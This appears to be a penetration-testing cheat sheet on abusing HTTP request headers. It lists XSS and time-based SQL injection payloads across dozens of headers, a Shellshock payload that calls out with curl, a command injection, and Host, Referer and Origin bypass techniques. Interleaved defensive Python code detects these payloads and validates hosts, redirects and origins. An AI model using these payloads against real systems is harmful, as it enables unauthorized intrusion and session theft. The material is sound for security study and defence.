HTTP Header Exploitation
Request Header payloads (xss, SQLi, etc.)
Misused or improperly validated headers can let an attacker:
Bypass login flows
Steal sessions
Hijack OAuth tokens
Abuse password reset links
Trick backend logic
Basic Payload
X-Forwarded-Host: evil.com"><img src/onerror=prompt(document.cookie)>
X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
Referer: https://site.com/'+(select*from(select(sleep(10)))a)+'
Cookie: 'XOR(if(now()=sysdate(),sleep(10),0))XOR'
User-Agent: "XOR(if(now()=sysdate(),sleep(10),0))XOR"
Testing
Change the host header
GET /index.php HTTP/1.1
Host: evil-website.com
...
Duplicating the host header
GET /index.php HTTP/1.1
Host: vulnerable-website.com
Host: evil-website.com
...
Add line wrapping
GET /index.php HTTP/1.1
Host: vulnerable-website.com
 Host: evil-website.com
...
Add host override headers
X-Forwarded-For: evil-website.com
X-Forwarded-Host: evil-website.com
X-Client-IP: evil-website.com
X-Remote-IP: evil-website.com
X-Remote-Addr: evil-website.com
X-Host: evil-website.com
How to use it? In this case I'm using "X-Forwarded-For : evil.com"
GET /index.php HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For : evil-website.com
...
Supply an absolute URL
GET https://vulnerable-website.com/ HTTP/1.1
Host: evil-website.com
...
XSS
Blind XSS
Command Injection
User-Agent: () { :; }; /bin/bash -c 'curl http://your-server.com'
X-Forwarded-For: 127.0.0.1; id
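From the defender's side, the payloads above are also useful as detection signatures. The following is an added example (not part of the original cheat sheet) that parses the header block of a raw request and flags header values matching the XSS, time-based SQLi and command-injection patterns listed on this page; the signature set, the list of "address-like" headers and the sample request are constructed for the example.

```python
import re

# Signatures drawn from the payload lists on this page. Each pattern is matched
# case-insensitively against a single header value.
SIGNATURES = {
    "time-based-sqli": re.compile(r"sleep\s*\(|sysdate\s*\(|\bxor\s*\(", re.I),
    "xss": re.compile(r"<\s*img|onerror\s*=|<\s*script", re.I),
    "shellshock": re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;"),
    "shell-metachar-in-address": re.compile(r"[;|`$]"),
}

# Headers an application reads as a client address or hostname (assumed list).
# A shell metacharacter in one of these is never legitimate, whereas ';' is
# normal in headers such as Accept-Language, Cookie or Forwarded.
ADDRESS_HEADERS = {
    "x-forwarded-for", "x-client-ip", "x-remote-ip", "x-remote-addr",
    "x-originating-ip", "x-host", "x-forwarded-host",
}


def classify_header(name, value):
    """Return the list of signature labels that match this header value."""
    name = name.lower()
    hits = []
    for label, pattern in SIGNATURES.items():
        if label == "shell-metachar-in-address" and name not in ADDRESS_HEADERS:
            continue
        if pattern.search(value):
            hits.append(label)
    return hits


def scan_raw_request(raw):
    """Parse the header block of a raw HTTP request; return [(header_name, [labels]), ...]."""
    findings = []
    lines = raw.replace("\r\n", "\n").split("\n")
    for line in lines[1:]:            # lines[0] is the request line
        if not line.strip():
            break                     # blank line ends the header block
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        hits = classify_header(name.strip(), value.strip())
        if hits:
            findings.append((name.strip(), hits))
    return findings


# Constructed sample request: three of the page's payloads among benign headers.
SAMPLE_REQUEST = "\n".join([
    "GET /index.php HTTP/1.1",
    "Host: vulnerable-website.com",
    "User-Agent: () { :; }; /bin/bash -c 'curl http://your-server.com'",
    "X-Forwarded-For: 127.0.0.1; id",
    "Referer: https://site.com/'+(select*from(select(sleep(10)))a)+'",
    "Accept-Language: en-GB,en;q=0.9",
    "Cookie: session=abc123; theme=dark",
    "",
])

if __name__ == "__main__":
    for header, labels in scan_raw_request(SAMPLE_REQUEST):
        print("%-16s %s" % (header, ", ".join(labels)))
```

The metacharacter rule is deliberately scoped to address-style headers; applied to every header it would fire on ordinary Cookie and Accept-Language values. In production the same classification would run in the reverse proxy or WAF log pipeline rather than in the application.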
SQLi
Accept: "' or sleep(30)='"
Accept-Charset: "' or sleep(30)='"
Accept-Datetime: "' or sleep(30)='"
Accept-Encoding: "' or sleep(30)='"
Accept-Language: "' or sleep(30)='"
Authorization: "' or sleep(30)='"
Cache-Control: "' or sleep(30)='"
Connection: "' or sleep(30)='"
Content-Length: "' or sleep(30)='"
Content-MD5: "' or sleep(30)='"
Content-Type: "' or sleep(30)='"
Cookie: "' or sleep(30)='"
Date: "' or sleep(30)='"
Expect: "' or sleep(30)='"
Forwarded: "' or sleep(30)='"
From: "' or sleep(30)='"
If-Match: "' or sleep(30)='"
If-Modified-Since: "' or sleep(30)='"
If-None-Match: "' or sleep(30)='"
If-Range: "' or sleep(30)='"
If-Unmodified-Since: "' or sleep(30)='"
Max-Forwards: "' or sleep(30)='"
Origin: "' or sleep(30)='"
Pragma: "' or sleep(30)='"
Proxy-Authorization: "' or sleep(30)='"
Range: "' or sleep(30)='"
Referer: "' or sleep(30)='"
TE: "' or sleep(30)='"
Upgrade: "' or sleep(30)='"
User-Agent: "' or sleep(30)='"
Via: "' or sleep(30)='"
Warning: "' or sleep(30)='"
X-Client-IP: "' or sleep(30)='"
X-Remote-IP: "' or sleep(30)='"
X-Remote-Addr: "' or sleep(30)='"
X-Forwarded-For: "' or sleep(30)='"
X-Originating-IP: "' or sleep(30)='"
X-Host: "' or sleep(30)='"
X-Forwarded-Host: "' or sleep(30)='"
Time Based SQLi
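Header-borne SQLi works because applications commonly log headers such as X-Forwarded-For or User-Agent into a database by string concatenation. The following is an added example, not code from the original page, contrasting that pattern with validation plus parameter binding; it uses an in-memory SQLite database and constructed X-Forwarded-For values (two of them are the time-based payloads listed above).

```python
import ipaddress
import sqlite3

# Constructed sample X-Forwarded-For values: one benign proxy chain, then two
# of the time-based payloads listed above.
SAMPLE_XFF = [
    "203.0.113.7, 10.0.0.2",
    "' or sleep(30)='",
    "0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z",
]


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (client_ip TEXT NOT NULL)")
    return conn


def record_visit_vulnerable(conn, xff):
    # The header value is pasted into the statement text, so the quote inside
    # the payload terminates the literal and the remainder is parsed as SQL.
    conn.execute("INSERT INTO visits (client_ip) VALUES ('%s')" % xff)


def first_hop(xff):
    """Left-most X-Forwarded-For entry if it parses as an IP address, else None."""
    candidate = xff.split(",", 1)[0].strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return None


def record_visit_safe(conn, xff):
    """Validate the value as an address, then bind it as a parameter; False if rejected."""
    ip = first_hop(xff)
    if ip is None:
        return False
    conn.execute("INSERT INTO visits (client_ip) VALUES (?)", (ip,))
    return True


def stored_ips(conn):
    return [row[0] for row in conn.execute("SELECT client_ip FROM visits ORDER BY rowid")]


def run_demo():
    vuln = new_db()
    altered = 0
    for xff in SAMPLE_XFF:
        try:
            record_visit_vulnerable(vuln, xff)
        except sqlite3.Error:
            # SQLite has no sleep()/XOR(), so the rewritten statement fails to
            # prepare; on MySQL the same rewrite would execute and sleep.
            altered += 1
    safe = new_db()
    accepted = [record_visit_safe(safe, xff) for xff in SAMPLE_XFF]
    return {"vulnerable_queries_altered": altered, "accepted": accepted, "stored": stored_ips(safe)}


if __name__ == "__main__":
    print(run_demo())
```

Parameter binding alone would already keep the payload inert (it would be stored as a literal string); the type check on top of it means the table never contains anything that is not an address, which also keeps later consumers of that column (reports, GeoIP lookups, admin pages) from handling attacker-shaped text.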

Open Redirect + Referer → Session Leak
Open Redirection
Scenario
A login page redirects users after authentication.
The Referer header is used to determine the “safe” redirect destination.
But there’s no validation on it.
Exploit Flow
Attacker sends victim to a login link with a crafted Referer like evil.com.
Server blindly trusts the header and sends a redirect to that external domain.
If session tokens or SSO codes are passed along, they’re exposed.
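The fix for this scenario is to treat Referer (or any "next" parameter) as untrusted input and only redirect to destinations that stay on the site. Added example, not from the original page: a validator that accepts site-relative paths and absolute URLs with exactly the site's own origin, and falls back to "/" for everything else. SITE_ORIGIN and the header dictionary shape are assumptions for the example.

```python
from urllib.parse import urlsplit

# Assumed canonical origin of the application; anything else is off-site.
SITE_ORIGIN = "https://example.com"


def safe_redirect_target(candidate, fallback="/"):
    """Return candidate only if it stays on this site; otherwise fallback."""
    if not candidate:
        return fallback
    candidate = candidate.strip()
    parts = urlsplit(candidate)
    if not parts.scheme and not parts.netloc:
        # Relative reference. Reject "//host" (protocol-relative) and "/\host",
        # which browsers normalise to "//host".
        if candidate.startswith("/") and not candidate.startswith(("//", "/\\")):
            return candidate
        return fallback
    site = urlsplit(SITE_ORIGIN)
    # Absolute URL: scheme and the whole authority must match exactly, so
    # "https://example.com.evil.com" and "https://example.com@evil.com" fail.
    if parts.scheme.lower() == site.scheme and parts.netloc.lower() == site.netloc:
        return candidate
    return fallback


def redirect_after_login(headers):
    """Destination after login. Referer is client-controlled, so it is validated like any other input."""
    return safe_redirect_target(headers.get("Referer"))


if __name__ == "__main__":
    for value in ("https://evil.com/", "//evil.com/", "/account", "https://example.com/account"):
        print("%-30s -> %s" % (value, safe_redirect_target(value)))
```

Comparing the full netloc rather than checking that the hostname "contains" or "ends with" the site name is what defeats the subdomain and userinfo tricks; the protocol-relative and backslash cases are the ones a quick "must start with /" check tends to miss.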
Host Header Injection → Password Reset Poisoning
Password Reset
Scenario
A password reset link is emailed to the user.
The link is constructed using the Host header.
Exploit Flow
Attacker intercepts a password reset request (or initiates it on behalf of a user).
They modify the Host header to their domain: evil.com.
The server builds the reset link like: https://evil.com/reset?token=abcd1234
The user receives this link and clicks it, revealing the reset token to the attacker.
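Both the Host-header testing section above and this password-reset scenario come down to one server-side rule: the request must not decide which host the application thinks it is. The following is an added example (not code from the original page) that serves both passages. It resolves the effective host from a raw request against an allowlist, rejecting a missing or duplicated Host, an obs-fold ("line-wrapped") header, and an absolute-URL request target that disagrees with Host, and honours X-Forwarded-Host only from a trusted proxy; it then builds the reset link from configuration instead of from Host. ALLOWED_HOSTS, CANONICAL_BASE_URL, TRUSTED_PROXIES and the sample requests are assumptions constructed for the example.

```python
from urllib.parse import urlsplit

# Assumed deployment settings: the hostnames this app answers for, the canonical
# base URL used in any link that is e-mailed to a user, and the only peers whose
# X-Forwarded-Host / X-Host headers are believed.
ALLOWED_HOSTS = {"vulnerable-website.com"}
CANONICAL_BASE_URL = "https://vulnerable-website.com"
TRUSTED_PROXIES = {"10.0.0.2"}
HOST_OVERRIDE_HEADERS = ("x-forwarded-host", "x-host")


def parse_headers(raw):
    """Return (request_line, [(name, value), ...]) keeping duplicates; ValueError on malformed lines."""
    lines = raw.replace("\r\n", "\n").split("\n")
    headers = []
    for line in lines[1:]:
        if line == "":
            break                                     # end of the header block
        if line[0] in " \t":
            # Obsolete line folding: a leading space hides a second "Host:" from some
            # parsers but not others, so the request is refused rather than guessed at.
            raise ValueError("obs-fold not accepted")
        if ":" not in line:
            raise ValueError("malformed header line")
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def effective_host(raw, peer_ip):
    """Host this request is for, or None when it must be rejected with 400."""
    try:
        request_line, headers = parse_headers(raw)
    except ValueError:
        return None
    hosts = [v for n, v in headers if n == "host"]
    if len(hosts) != 1:
        return None                                   # missing or duplicated Host
    host = hosts[0].lower()
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    if "://" in target:
        # Absolute-form target: its authority takes precedence, so it must agree with Host.
        if urlsplit(target).netloc.lower() != host:
            return None
    if peer_ip in TRUSTED_PROXIES:
        for name, value in headers:
            if name in HOST_OVERRIDE_HEADERS:
                host = value.lower()                  # still subject to the allowlist below
                break
    return host if host in ALLOWED_HOSTS else None


def build_reset_link_vulnerable(headers, token):
    # Pattern from the scenario above: the link inherits whatever Host the request carried.
    return "https://%s/reset?token=%s" % (headers["Host"], token)


def build_reset_link(token):
    # Configuration, not the request, decides where the link points.
    return "%s/reset?token=%s" % (CANONICAL_BASE_URL, token)


# Constructed requests mirroring the testing section above.
SAMPLES = {
    "plain": "GET /index.php HTTP/1.1\nHost: vulnerable-website.com\n\n",
    "changed_host": "GET /index.php HTTP/1.1\nHost: evil-website.com\n\n",
    "duplicate_host": "GET /index.php HTTP/1.1\nHost: vulnerable-website.com\nHost: evil-website.com\n\n",
    "line_wrapped": "GET /index.php HTTP/1.1\nHost: vulnerable-website.com\n Host: evil-website.com\n\n",
    "override_header": "GET /index.php HTTP/1.1\nHost: vulnerable-website.com\nX-Forwarded-Host: evil-website.com\n\n",
    "absolute_url": "GET https://vulnerable-website.com/ HTTP/1.1\nHost: evil-website.com\n\n",
}


def check_all(peer_ip="198.51.100.9"):
    """Map each sample to the host it resolves to (None = reject) for a given peer address."""
    return {name: effective_host(raw, peer_ip) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, host in check_all().items():
        print("%-16s -> %s" % (name, host or "reject"))
```

Two points worth noting: the override header is honoured only when the peer is a trusted proxy and even then the value still has to be on the allowlist, so a proxy that passes the client's X-Forwarded-Host through unchanged does not reopen the hole; and the reset link never touches the request at all, which is the actual fix for reset poisoning regardless of how well Host is validated.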
CSRF + Origin Header Bypass
CSRF
Scenario
A server uses Origin header to validate POST requests.
But it only partially matches or ignores subdomains.
Exploit Flow
The server expects Origin: https://example.com.
Attacker sends Origin: https://evil.example.com — which still passes.
CSRF protections are bypassed.
Try bypassing Origin and Referer checks with:
Similar subdomains
Capitalization
Multiple headers (e.g., X-Origin, X-Forwarded-Host)
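The bypasses listed above (similar subdomains, capitalization, extra headers) all target a check that compares part of the Origin string instead of the whole origin. Added example, not from the original page: the weak suffix match beside a strict check that normalises Origin (or, failing that, Referer) to scheme://host[:port] and requires an exact allowlist hit, ignoring X-Origin, X-Forwarded-Host and any other look-alike header. ALLOWED_ORIGINS and the plain-dict header shape are assumptions for the example.

```python
from urllib.parse import urlsplit

# Assumed: the exact origins (scheme + host + port) allowed to send state-changing requests.
ALLOWED_ORIGINS = {"https://example.com"}


def get_header(headers, name):
    """Case-insensitive lookup in a plain dict of request headers."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def normalize_origin(value):
    """Reduce an Origin or Referer value to 'scheme://host[:port]' (lowercased); None if unusable."""
    if not value or value.strip() == "null":
        return None
    try:
        parts = urlsplit(value.strip())
        host, port = parts.hostname, parts.port      # .port raises ValueError on a bad port
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not host:
        return None
    default_port = 443 if parts.scheme == "https" else 80
    if port is None or port == default_port:
        return "%s://%s" % (parts.scheme, host)
    return "%s://%s:%d" % (parts.scheme, host, port)


def weak_origin_check(headers):
    # The flawed check from the scenario above: a suffix match that also
    # accepts "https://evil.example.com".
    origin = get_header(headers, "Origin") or ""
    return origin.endswith("example.com")


def strict_origin_check(headers):
    """Allow a state-changing request only if Origin, or failing that Referer,
    is exactly an allowed origin. Only those two headers are consulted; X-Origin,
    X-Forwarded-Host and similar are ignored. No usable value means reject."""
    source = get_header(headers, "Origin") or get_header(headers, "Referer")
    origin = normalize_origin(source)
    return origin is not None and origin in ALLOWED_ORIGINS


if __name__ == "__main__":
    probe = {"Origin": "https://evil.example.com"}
    print("weak:", weak_origin_check(probe), "strict:", strict_origin_check(probe))
```

Failing closed when neither header is present is the right default for state-changing requests, since browsers always send Origin on cross-origin POSTs; this check complements a per-session CSRF token rather than replacing it.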
Tool
Resources
Interesting Books
The Web Application Hacker's Handbook: The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.